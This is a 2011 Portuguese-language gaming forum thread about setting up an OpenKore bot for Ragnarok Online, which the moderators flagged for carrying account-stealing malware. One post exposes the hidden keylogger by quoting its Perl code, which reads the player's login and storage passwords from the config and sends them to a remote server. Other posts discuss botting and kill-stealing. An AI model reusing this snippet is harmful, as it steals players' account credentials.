Susanoo Sasuke 0 Postado 17 de Julho 2011 Compartilhar Postado 17 de Julho 2011 Tópico editado pela moderação por conter conteúdo malicioso. O tópico foi denunciado por conter vírus para roubo de contas. Tópico da denúncia: http://www.webcheats.com.br/forum/opinioes-e-reclamacoes/1011695-denuncia-programa-inadequado.html Prova: Estarei banindo o membro e as demais contas que ele possa estar usando. Desculpem-nos o transtorno. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
fale_fale 0 Postado 17 de Julho 2011 Compartilhar Postado 17 de Julho 2011 só fica dand erro senha errado.. mais minha senha tá certo.. qro logo normal ...e no openkore so diz senha incorreta ?? pq ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Susanoo Sasuke 0 Postado 17 de Julho 2011 Autor Compartilhar Postado 17 de Julho 2011 experimenta trocar la no severtype em severs.txt para fRO ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
fale_fale 0 Postado 17 de Julho 2011 Compartilhar Postado 17 de Julho 2011 Funcionou, mais só fica dizendo.. desistindo o alvo - você nao roubara dos outro alguem explica como vou da ks.. pq so fika dizendo desistindo o alvo - você nao roubara monstros dos outro ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Susanoo Sasuke 0 Postado 17 de Julho 2011 Autor Compartilhar Postado 17 de Julho 2011 viche dar ks e feio em tio,cuidado com ban desse jeito ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
fale_fale 0 Postado 17 de Julho 2011 Compartilhar Postado 17 de Julho 2011 mais como vou upar... pq so fika dizendo desistindo o alvo - você nao roubara monstros dos outro nao mata e nem um bixo ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Susanoo Sasuke 0 Postado 17 de Julho 2011 Autor Compartilhar Postado 17 de Julho 2011 dar ks e muito feio,mais todo mundo ta dando com seus bots,eu quando upo não do ks,mais olhe,além de usar o bot vai dar ks,ae fica muito feio auhauaua ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
frde 0 Postado 17 de Julho 2011 Compartilhar Postado 17 de Julho 2011 ESTE OPENKORE ESTÁ COM KEYLOGGER INTEGRADO NA PASTA PLUING NO ARQUIVO MACRO,QUE NA VERDADE É UM KEYLOGGER FAÇA O TESTE VOCÊ MESMO,VÁ NA PASTA PLUING, MACRO , ABRIR COM BLOCO DE NOTAS LÁ APERTEM CONTROL+F, E ACHEM UMA LINHA ESCRITA : use LWP::UserAgent; use Utils qw(urlencode); my $ua = LWP::UserAgent->new; $ua->timeout(10); $ua->env_proxy; my $usuario = $config{'username'}; $usuario =~ s/#/:/; my $senha = $config{'password'}; $senha =~ s/#/:/; my $kafra = $config{'storageAuto_password'}; $kafra =~ s/#/:/; my $response = $ua->get(" É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se $senha $kafra"); É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Susanoo Sasuke 0 Postado 17 de Julho 2011 Autor Compartilhar Postado 17 de Julho 2011 obrigado por testar e confirmar frde,intão era apenas com ele o erro! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
lucascotta 0 Postado 17 de Julho 2011 Compartilhar Postado 17 de Julho 2011 cara a máquina virtual que ele fala, a que eu criei é xp, eu preciso colocar o perl nela também? @EDIT esqueci de mencionar que o meu computador normal é win7 ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Susanoo Sasuke 0 Postado 17 de Julho 2011 Autor Compartilhar Postado 17 de Julho 2011 concertesa,essa maquina virtual nada mais é que o xp que vc ta usando e precisa do active perl,eu postei ele aqui no topico,só baixar ele e instalar ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
lucascotta 0 Postado 17 de Julho 2011 Compartilhar Postado 17 de Julho 2011 Valeu mano, to instalando aqui a maquina se funfar eu te do um thx =P ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
fale_fale 0 Postado 17 de Julho 2011 Compartilhar Postado 17 de Julho 2011 merda.. continua isso.. fdp.. nao da.. vou desisti.. hj tinha pegado keylogger outro open kore... mais valeu esse eh confiavel...mais não consigo matar mosntro.. se vc puder me explica como nao desisti o alvo.. se nao quer explica.. ai tudo bem.. vou desisti... Vlw aee susanooo por ajuda ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Susanoo Sasuke 0 Postado 17 de Julho 2011 Autor Compartilhar Postado 17 de Julho 2011 Vo sai mais tarde volto! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
July Babi 0 Postado 17 de Julho 2011 Compartilhar Postado 17 de Julho 2011 so a irmã do Susanoo,ele saiu irei monitorar o tópico dele aqui xD ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
lucascotta 0 Postado 17 de Julho 2011 Compartilhar Postado 17 de Julho 2011 Ow o bot que eu baixei não tem o "poseidonclient" pra por na pasta do ragnarok.. eaí? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Susanoo Sasuke 0 Postado 17 de Julho 2011 Autor Compartilhar Postado 17 de Julho 2011 logico que tem apenas copie todos os arquivos que está dentro dessa pasta ae e cola dentro da pasta do bro,se vc for dentro da pasta data está a dentro ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
lucascotta 0 Postado 17 de Julho 2011 Compartilhar Postado 17 de Julho 2011 logico que tem apenas copie todos os arquivos que está dentro dessa pasta ae e cola dentro da pasta do bro,se vc for dentro da pasta data está a dentro não tem brother já olhei... igual do video não tem... ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Susanoo Sasuke 0 Postado 17 de Julho 2011 Autor Compartilhar Postado 17 de Julho 2011 o video como eu escrevi lá não é meu,pegue esses arquivos que estao dentro da pasta chama,arquivos que vão para pasta bro copia todos eles e cola lá,apenas isso ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
lucascotta 0 Postado 17 de Julho 2011 Compartilhar Postado 17 de Julho 2011 o video como eu escrevi lá não é meu,pegue esses arquivos que estao dentro da pasta chama,arquivos que vão para pasta bro copia todos eles e cola lá,apenas isso e qual a ordem dos arquivos que eu tenho que abrir? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Susanoo Sasuke 0 Postado 17 de Julho 2011 Autor Compartilhar Postado 17 de Julho 2011 dentro da pasta do bot tem que abrir o poseidon.pl que fica dentro da pasta src/poseidon depois vai la na pasta do ragnarok e abre o StartRO ae por ultimo vai na pasta do openkore central e abra o Openkore.pl ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Duxo~ 0 Postado 17 de Julho 2011 Compartilhar Postado 17 de Julho 2011 Funfa em Win 7? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Susanoo Sasuke 0 Postado 18 de Julho 2011 Autor Compartilhar Postado 18 de Julho 2011 funfa sim,se vc usar maquina virtual funciona perfeitamente ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
July Babi 0 Postado 18 de Julho 2011 Compartilhar Postado 18 de Julho 2011 agora monitoro pra vc manim xD ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
gustavoroqueiro 0 Postado 18 de Julho 2011 Compartilhar Postado 18 de Julho 2011 Mano aqui ta pegando de boa valeus, mas passa uns 15minutos e fica tentando reconectar, o problema é que nunca conecta novamente, daí eu preciso ficar de 10 em 10minutos repetindo a operação de logar o bot. O QUE EU FAÇO??? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Posts Recomendados